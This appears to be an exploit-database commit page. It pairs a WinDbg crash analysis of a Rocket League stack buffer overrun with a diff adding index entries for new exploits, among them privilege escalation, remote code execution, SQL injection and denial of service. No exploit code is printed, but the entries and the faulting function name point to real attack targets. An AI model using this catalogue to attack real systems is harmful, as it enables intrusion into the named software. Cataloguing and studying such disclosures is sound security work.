04 00007ffe`afc812de : 00000000`00000000 000001a1`cc3560c0 00007ff6`4948a38b 000001a1`cc362268 : ntdll!KiUserExceptionDispatch+0x2e
05 00007ff6`4948a38b : 000001a1`cc362268 00000098`52afea40 00000098`52afea40 000001a1`cc362268 : VCRUNTIME140!memcpy_repmovs+0xe [d:\agent\_work\1\s\src\vctools\crt\vcruntime\src\string\amd64\memcpy.asm @ 114]
06 00007ff6`494fe648 : 000001a1`cc362268 00000098`52afead8 00002215`1710d82a 00007ff6`00000003 : RocketLeague!AK::MusicEngine::Term+0x9700b
07 00007ff6`494e3e65 : 000001a1`cc362080 00000098`52afead8 00000000`00000000 00000000`00000001 : RocketLeague!AK::MusicEngine::Term+0x10b2c8
08 fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : RocketLeague!AK::MusicEngine::Term+0xf0ae5
09 efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60
0a fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e
0b efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60
0c fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e
0d efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60
0e fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : 0xefaf2dc5`69758c3e
0f efaf2dc5`69758c3e : fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e : 0xfab8446d`6e5edd60
0:000> !analyze -m
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
KEY_VALUES_STRING: 1
Key : Analysis.CPU.mSec
Value: 5640
Key : Analysis.DebugAnalysisManager
Value: Create
Key : Analysis.Elapsed.mSec
Value: 6467
Key : Analysis.Init.CPU.mSec
Value: 400749
Key : Analysis.Init.Elapsed.mSec
Value: 1699165
Key : Analysis.Memory.CommitPeak.Mb
Value: 261
Key : FailFast.Name
Value: STACK_COOKIE_CHECK_FAILURE
Key : FailFast.Type
Value: 2
Key : Timeline.OS.Boot.DeltaSec
Value: 215108
Key : Timeline.Process.Start.DeltaSec
Value: 1744
Key : WER.OS.Branch
Value: vb_release
Key : WER.OS.Timestamp
Value: 2019-12-06T14:06:00Z
Key : WER.OS.Version
Value: 10.0.19041.1
Key : WER.Process.Version
Value: 1.0.10897.0
NTGLOBALFLAG: 0
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS: 0
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ff64a660424 (RocketLeague!AK::MemoryMgr::GetPoolName+0x0000000000084164)
ExceptionCode: c0000409 (Security check failure or stack buffer overrun)
ExceptionFlags: 00000001
NumberParameters: 1
Parameter[0]: 0000000000000002
Subcode: 0x2 FAST_FAIL_STACK_COOKIE_CHECK_FAILURE
FAULTING_THREAD: 0000230c
PROCESS_NAME: RocketLeague.exe
ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
EXCEPTION_CODE_STR: c0000409
EXCEPTION_PARAMETER1: 0000000000000002
STACK_TEXT:
00000098`52afda90 00007ff6`4a65fdcf : efaf2d5d`3bda668e 00000000`00000000 00000098`52afe090 00000098`52afe080 : RocketLeague!AK::MemoryMgr::GetPoolName+0x84164
00000098`52afdad0 00007ffe`d735207f : 00007ff6`4a65fdbc 00000000`00000000 00000000`00000000 00000000`00000000 : RocketLeague!AK::MemoryMgr::GetPoolName+0x83b0f
00000098`52afdb00 00007ffe`d7301454 : 00000000`00000000 00000098`52afe070 00000098`52afe730 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xf
00000098`52afdb30 00007ffe`d7350bae : 3f400000`3f000000 3f800000`3f800000 000001a1`cc362268 44160000`44bb8000 : ntdll!RtlDispatchException+0x244
00000098`52afe240 00007ffe`afc812de : 00000000`00000000 000001a1`cc3560c0 00007ff6`4948a38b 000001a1`cc362268 : ntdll!KiUserExceptionDispatch+0x2e
00000098`52afe9c8 00007ff6`4948a38b : 000001a1`cc362268 00000098`52afea40 00000098`52afea40 000001a1`cc362268 : VCRUNTIME140!memcpy_repmovs+0xe
00000098`52afe9e0 00007ff6`494fe648 : 000001a1`cc362268 00000098`52afead8 00002215`1710d82a 00007ff6`00000003 : RocketLeague!AK::MusicEngine::Term+0x9700b
00000098`52afea20 00007ff6`494e3e65 : 000001a1`cc362080 00000098`52afead8 00000000`00000000 00000000`00000001 : RocketLeague!AK::MusicEngine::Term+0x10b2c8
00000098`52afeab0 fab8446d`6e5edd60 : efaf2dc5`69758c3e fab8446d`6e5edd60 efaf2dc5`69758c3e fab8446d`6e5edd60 : RocketLeague!AK::MusicEngine::Term+0xf0ae5
...
...
STACK_COMMAND: ~0s ; .cxr ; kb
SYMBOL_NAME: RocketLeague!AK::MemoryMgr::GetPoolName+84164
MODULE_NAME: RocketLeague
IMAGE_NAME: RocketLeague.exe
FAILURE_BUCKET_ID: FAIL_FAST_STACK_BUFFER_OVERRUN_STACK_COOKIE_CHECK_FAILURE_MISSING_GSFRAME_c0000409_RocketLeague.exe!AK::MemoryMgr::GetPoolName
OS_VERSION: 10.0.19041.1
BUILDLAB_STR: vb_release
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
IMAGE_VERSION: 1.0.10897.0
FAILURE_ID_HASH: {3e6f3f5b-25bb-68b3-2a5b-232743df7884}
Followup: MachineOwner

11
files_exploits.csv
View file

@ -6780,6 +6780,7 @@ id,file,description,date,author,type,platform,port
49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",2021-04-15,xynmaps,dos,multiple, 49773,exploits/multiple/dos/49773.py,"glFTPd 2.11a - Remote Denial of Service",2021-04-15,xynmaps,dos,multiple,
49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",2021-04-21,"Dolev Farhi",dos,multiple, 49789,exploits/multiple/dos/49789.py,"Hasura GraphQL 1.3.3 - Denial of Service",2021-04-21,"Dolev Farhi",dos,multiple,
49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",2021-04-27,"Dolev Farhi",dos,php, 49807,exploits/php/dos/49807.py,"WordPress Plugin WPGraphQL 1.3.5 - Denial of Service",2021-04-27,"Dolev Farhi",dos,php,
49844,exploits/windows/dos/49844.py,"Sandboxie 5.49.7 - Denial of Service (PoC)",2021-05-07,"Erick Galindo",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -11315,6 +11316,10 @@ id,file,description,date,author,type,platform,port
49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",2021-03-24,"Mohammed Alshehri",local,windows, 49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",2021-03-24,"Mohammed Alshehri",local,windows,
49739,exploits/windows/local/49739.txt,"Rockstar Service - Insecure File Permissions",2021-04-05,"George Tsimpidas",local,windows, 49739,exploits/windows/local/49739.txt,"Rockstar Service - Insecure File Permissions",2021-04-05,"George Tsimpidas",local,windows,
49765,exploits/linux/local/49765.txt,"MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution",2021-04-14,"Central InfoSec",local,linux, 49765,exploits/linux/local/49765.txt,"MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution",2021-04-14,"Central InfoSec",local,linux,
49841,exploits/windows/local/49841.txt,"Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation",2021-05-07,LiquidWorm,local,windows,
49842,exploits/windows/local/49842.txt,"Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path",2021-05-07,"Erick Galindo",local,windows,
49845,exploits/windows/local/49845.txt,"WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path",2021-05-07,"Erick Galindo",local,windows,
49848,exploits/windows/local/49848.txt,"Epic Games Rocket League 1.95 - Stack Buffer Overrun",2021-05-07,LiquidWorm,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -44003,7 +44008,11 @@ id,file,description,date,author,type,platform,port
49834,exploits/multiple/webapps/49834.js,"Markright 1.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple, 49834,exploits/multiple/webapps/49834.js,"Markright 1.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple,
49835,exploits/multiple/webapps/49835.js,"Markdownify 1.2.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple, 49835,exploits/multiple/webapps/49835.js,"Markdownify 1.2.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple,
49836,exploits/multiple/webapps/49836.js,"Anote 1.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple, 49836,exploits/multiple/webapps/49836.js,"Anote 1.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple,
49837,exploits/multiple/webapps/49837.txt,"Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)",2021-05-06,"Enes Özeser",webapps,multiple, 49837,exploits/multiple/webapps/49837.txt,"Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)",2021-05-06,"Emircan Baş",webapps,multiple,
49838,exploits/multiple/webapps/49838.txt,"Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)",2021-05-06,"Eren Saraç",webapps,multiple, 49838,exploits/multiple/webapps/49838.txt,"Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)",2021-05-06,"Eren Saraç",webapps,multiple,
49839,exploits/php/webapps/49839.txt,"Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload",2021-05-06,h4shur,webapps,php, 49839,exploits/php/webapps/49839.txt,"Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload",2021-05-06,h4shur,webapps,php,
49840,exploits/php/webapps/49840.py,"b2evolution 7-2-2 - 'cf_name' SQL Injection",2021-05-06,nu11secur1ty,webapps,php, 49840,exploits/php/webapps/49840.py,"b2evolution 7-2-2 - 'cf_name' SQL Injection",2021-05-06,nu11secur1ty,webapps,php,
49843,exploits/php/webapps/49843.txt,"Voting System 1.0 - Authentication Bypass (SQLI)",2021-05-07,secure77,webapps,php,
49846,exploits/php/webapps/49846.txt,"Voting System 1.0 - Remote Code Execution (Unauthenticated)",2021-05-07,secure77,webapps,php,
49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php,
49849,exploits/php/webapps/49849.txt,"PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection # Date: May 3rd 2021",2021-05-07,"Tyler Butler",webapps,php,

Can't render this file because it is too large.